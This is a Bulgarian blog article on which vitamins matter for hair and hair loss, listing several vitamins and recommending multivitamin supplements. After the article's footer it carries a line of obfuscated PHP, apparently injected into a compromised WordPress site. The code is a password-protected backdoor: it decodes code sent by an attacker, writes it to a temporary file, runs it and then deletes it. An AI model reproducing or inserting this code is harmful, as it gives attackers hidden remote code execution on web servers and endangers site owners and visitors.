Кои Витамини са най- важните за Косата ни | Косопад

Кои Витамини са най- важните за Косата ни

kosopad-2

Витамините осигуряват на косата храна и кислород, така че да е блестяща, здрава и красива.

Ако някой витамин не ни достигат, в дефицит е, могат да се появят най- различни проблеми: късане на косата, липса на блясък, изтъняване, косопад и пр.

Нека разгледаме кои са най- важните витамини за косата.

Косата е част от епидермиса на кожата. Всеки косъм се състои от дълга нишка, която се заражда във фоликула, който се намира под кожата. За да бъде в добро състояние косъмът, грижата за неговия корен, или фоликул, е много важна. А той се поддържа в отлична форма, когато получава достатъчно хранителни вещества и кислород.

Чрез кръвта косменият корен, или фоликул, получава необходимото количество био- органични вещества (кислород, протеини, мазнини, въглехидрати, витамини и минерали).

kosopad-3

Когато това се случва, косата е здрава, еластична и блестяща. Също така показва, че притежателят й е в отлично здраве.

Когато обаче това не се случва, се появяват различни проблеми, като най- сериозният е косопадът.
Ако клетките на космените нишки не получават достатъчно вещества, ако не им достигат витамини или други вещества, започват да „умират от глад“.

РОЛЯТА НА ВИТАМИНИТЕ
Всеки витамин активира специфична био- химична реакция. Например, витамин А активира процеса на синтез на нишки колаген, който е от първостепенно значение за кожата, ноктите, косата, съединителната тъкан и др.

Косопад може да се появи при дефицит, недостиг, на някой или някои от следните витамини:
-витамин А (ретинол)
-витамин В2 (рибофлавин)
-витамин В3 (РР, никотинамид, )
-витамин В5 (пантенол, пантенолова киселина)
-витамин В6 (пироксидин)
-витамин Н (биотин)
-витамин В9 (фолиева киселина)
-витамин С
-витамин Е
-витамин F

За да си осигурите всички тези витамини в правилната дневна доза, най- добрият начин за прием е под формата на добавка мултивитамини.

Ако не желаете да приемате мултивитамини, поне си осигурете следните най- важни витамини за косата:
-витамин Н (биотин)
-витамин В5 (пантенол)
-витамин Е
-витамин А
-витамин С

05. януари 2017 14:43:36 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}